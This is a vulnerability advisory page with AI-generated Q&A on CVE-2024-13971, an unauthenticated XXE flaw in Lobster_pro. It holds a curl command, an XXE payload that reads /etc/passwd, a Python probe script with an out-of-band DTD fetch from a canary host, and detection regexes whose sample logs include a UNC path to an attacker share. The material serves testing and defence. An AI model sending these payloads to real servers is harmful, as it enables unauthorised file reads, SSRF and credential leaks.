CVE-2024-13971
Unauthenticated File Read in Lobster_pro XML Parser
Publication date: 2026-04-30
Last updated on: 2026-05-06
Assigner: SCHUTZWERK
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| lobster-world | lobster_pro | all versions before 4.12.6-GA (4.12.6-GA itself is not affected) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2024-13971 is an XML External Entity (XXE, CWE-611) vulnerability in the XML parser used by Lobster_pro versions before 4.12.6-GA. The parser resolves external entities and external DTD references in attacker-supplied XML without restriction, and the affected endpoint accepts XML from unauthenticated clients. An attacker who sends a crafted XML document can therefore make the server read files from its local filesystem and from network shares reachable from it, and return the contents in the response.
The same mechanism lets the attacker make the server issue HTTP GET requests to arbitrary hosts (server-side request forgery, SSRF), exfiltrate data out of band through an attacker-hosted external DTD, and potentially leak NTLM credentials by making the server connect to an attacker-controlled SMB share via a UNC path (relevant where the server runs on Windows). All of these variants exist because the parser follows external DTD and entity references instead of rejecting them.
How can this vulnerability impact me?
The primary impact is unauthorized disclosure: an unauthenticated attacker can read files on the application server (configuration files, credentials, integration definitions) and on network shares the server can reach, without needing any account on the system.
Because the parser also fetches arbitrary URLs, the attacker can use the server as a proxy to issue HTTP GET requests to internal services that are not reachable from outside, which supports reconnaissance and pivoting within the network.
The SSRF behaviour can be used to bypass firewall boundaries and reach internal resources, and the SMB variant may leak the server's NTLM hash to an attacker-controlled host, which raises the risk of follow-on compromise through relay or offline cracking.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Start with the version: any Lobster_pro instance reporting a version before 4.12.6-GA is affected. To confirm the behaviour, test the endpoint https://<lobster-pro instance>:443/system/web, which accepts XML documents via HTTP POST. Send a document that declares an external entity pointing at a local file and references it in the body, then inspect the response: a vulnerable server reflects the file contents (or, for a directory path, a directory listing), or returns a parser error message that reveals the referenced path.
If nothing is reflected, the parser may still be resolving external references blindly. Repeat the test with a parameter entity that points at a DTD hosted on an HTTP listener you control; a request arriving at that listener proves the server fetches external DTDs and is exposed to the SSRF and out-of-band variants even when the response stays silent.
Example commands to test this, using curl to POST a payload file (`-k` accepts the self-signed certificate typical of lab instances, `-i` shows the status line and headers so an error response is not overlooked, and `--data-binary` sends the file unchanged, whereas `-d` strips newlines):

```shell
curl -k -i -X POST "https://<lobster-pro instance>:443/system/web" \
  -H "Content-Type: application/xml" \
  --data-binary @payload.xml
```

Where payload.xml declares an external entity that references a local file and then expands it in the document body:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
```

If the response contains the contents of the referenced file, an error message revealing the file path, or your listener records the DTD fetch from the out-of-band variant, the instance is vulnerable.
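The probe procedure above, as an added example in Python that is not part of this page, the advisory or Lobster's code: it builds the in-band and out-of-band payloads, sends them with curl-equivalent settings, and classifies the response so that a "nothing reflected" result is followed up rather than mistaken for "not vulnerable". The endpoint path /system/web is taken from the text; the host, the canary URL and the probed file paths are placeholders to substitute for your own test.

```python
"""Probe builder and response triage for the CVE-2024-13971 test procedure.

Added example for this page; it is not Lobster's code and not from the
advisory. The endpoint path /system/web is taken from the text; the host,
the canary URL and the file paths are placeholders to substitute.
"""
import re
import ssl
import urllib.error
import urllib.request


def inband_payload(path="/etc/passwd"):
    """Classic in-band XXE: the entity resolves a local file and the parser
    substitutes its content where &xxe; appears, so a vulnerable server
    reflects the file (or a directory listing) in its response."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [\n"
        "  <!ELEMENT foo ANY >\n"
        f'  <!ENTITY xxe SYSTEM "file://{path}" >\n'
        "]>\n"
        "<foo>&xxe;</foo>\n"
    )


def oob_payload(canary_url):
    """Blind / out-of-band variant: a parameter entity makes the parser fetch
    an external DTD from a host you control. A request logged on that host
    proves external-reference resolution even when nothing is reflected."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY % ext SYSTEM "{canary_url}">\n'
        "  %ext;\n"
        "]>\n"
        "<foo>probe</foo>\n"
    )


def send(url, body, timeout=15.0):
    """POST a payload and return (status, response_text). Error bodies are
    returned too, because XXE frequently leaks file content or paths inside
    a parser error. Needs network access; the offline checks do not call it."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # lab instances usually have self-signed
    ctx.verify_mode = ssl.CERT_NONE  # certificates; this is curl's -k
    req = urllib.request.Request(
        url, data=body.encode("latin-1"), method="POST",
        headers={"Content-Type": "application/xml"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


# A line that looks like an /etc/passwd entry: name:x:uid:gid:...
PASSWD_LINE = re.compile(r"^[A-Za-z0-9_.-]+:[^:\n]*:\d+:\d+:", re.MULTILINE)


def triage(response_text, probed_path, marker=PASSWD_LINE):
    """Classify an in-band probe response:
    'reflected'    the file content came back (marker regex matched)
    'error-leak'   the probed path is echoed, typically in a parser error
    'inconclusive' nothing visible; follow up with oob_payload()"""
    if marker.search(response_text):
        return "reflected"
    if probed_path in response_text:
        return "error-leak"
    return "inconclusive"


if __name__ == "__main__":
    # Offline demonstration on a constructed response; for a live test call
    # send("https://<lobster-pro instance>:443/system/web", inband_payload()).
    print(inband_payload())
    print(oob_payload("http://canary.example.net/probe.dtd"))
    constructed = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    print(triage(constructed, "/etc/passwd"))
```

For a Windows target substitute a path such as `C:/Windows/win.ini` and pass a marker that matches that file (for example a section header like `[fonts]`); the triage logic is the same.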
What immediate steps should I take to mitigate this vulnerability?
The recommended mitigation is to update Lobster_pro to version 4.12.6-GA or later, where this vulnerability is fixed.
Until the update can be applied, restrict access to the /system/web endpoint to the clients that need it (network ACL or reverse-proxy rule), and reject or alert on POST bodies to that endpoint that contain a DOCTYPE declaration with an external entity or a parameter-entity reference (check first that your own integrations do not send DTDs before blocking). Egress filtering from the application server, blocking outbound HTTP to untrusted hosts and outbound SMB entirely, limits the SSRF, out-of-band exfiltration and NTLM-leak variants even while the parser is still vulnerable.
Network-level controls that keep the application server off adjacent network shares it does not need reduce what a successful file read can reach.
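The monitoring step above, as an added example that is not part of this page, the advisory or the product: detection logic that flags POST requests to the affected endpoint whose body carries XXE indicators (an external entity declaration, a parameter-entity reference, or a file:// or UNC reference), distinguishing them from harmless internal DTDs and ordinary XML. The JSON log format and every request body are constructed for this example; in practice you would feed it reverse-proxy or WAF logs that record request bodies.

```python
"""Detection logic for XXE probes against /system/web.

Added example; it is not part of the page, the advisory or the product.
The JSON log format and all request bodies below are constructed.
"""
import json
import re

DOCTYPE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
# External general or parameter entity: <!ENTITY name SYSTEM ...> or <!ENTITY % name SYSTEM ...>
EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
# A parameter-entity reference (%name;) is what pulls in an external DTD for the OOB variants.
PARAM_ENTITY_REF = re.compile(r"%[\w.-]+;")
# file:// and ftp:// schemes, or a UNC path (\\host\share) that would trigger an SMB connection.
RISKY_URI = re.compile(r"\b(file|ftp)://|\\\\[\w.-]+\\", re.IGNORECASE)


def xxe_indicators(body):
    """Return the indicators found in one request body, in a fixed order."""
    reasons = []
    if DOCTYPE.search(body):
        reasons.append("doctype")
        if EXTERNAL_ENTITY.search(body):
            reasons.append("external-entity")
        if PARAM_ENTITY_REF.search(body):
            reasons.append("parameter-entity")
    if RISKY_URI.search(body):
        reasons.append("file-or-unc-uri")
    return reasons


def severity(reasons):
    """'high' for anything that reaches outside the document; 'review' for a
    bare DOCTYPE (internal DTDs are legal XML but unusual in integration
    traffic); None when nothing was found."""
    if any(r in reasons for r in ("external-entity", "parameter-entity", "file-or-unc-uri")):
        return "high"
    return "review" if "doctype" in reasons else None


def scan(log_lines, path="/system/web"):
    """Scan JSON log records and return the flagged POSTs to `path`."""
    hits = []
    for line in log_lines:
        rec = json.loads(line)
        if rec.get("method") != "POST" or not rec.get("path", "").startswith(path):
            continue
        reasons = xxe_indicators(rec.get("body", ""))
        sev = severity(reasons)
        if sev:
            hits.append({"src": rec.get("src"), "severity": sev, "reasons": reasons})
    return hits


# Constructed sample log: two XXE probes, one harmless internal DTD, one normal
# request, one GET, and one XXE aimed at a different path (ignored by scan()).
SAMPLE_LOG = [json.dumps(r) for r in [
    {"src": "203.0.113.7", "method": "POST", "path": "/system/web",
     "body": '<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
             '<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'},
    {"src": "203.0.113.7", "method": "POST", "path": "/system/web",
     "body": '<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://canary.example.net/x.dtd">%ext;]><foo/>'},
    {"src": "198.51.100.4", "method": "POST", "path": "/system/web",
     "body": '<!DOCTYPE foo [<!ENTITY greet "hello">]><foo>&greet;</foo>'},
    {"src": "10.0.0.5", "method": "POST", "path": "/system/web",
     "body": "<order><id>42</id></order>"},
    {"src": "10.0.0.6", "method": "GET", "path": "/system/web", "body": ""},
    {"src": "203.0.113.9", "method": "POST", "path": "/api/other",
     "body": '<!DOCTYPE x [<!ENTITY e SYSTEM "\\\\attacker\\share\\x">]><x>&e;</x>'},
]]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Tune the `review` tier to your own traffic: if your integrations never send a DOCTYPE to this endpoint, promote it to a block at the reverse proxy rather than an alert.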
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability lets unauthenticated attackers read sensitive files on the application server and on adjacent network shares, and make the server issue HTTP GET requests to arbitrary services, so a successful exploit is an unauthorized access to, and potential disclosure of, whatever data those files and services hold.
Where that data includes personal data (GDPR) or protected health information (HIPAA), such a disclosure is the kind of event those regimes require organisations to prevent and, if it occurs, to assess and potentially report.
The advisory itself does not discuss compliance, so any concrete obligation depends on what data the affected instance and its reachable shares actually hold.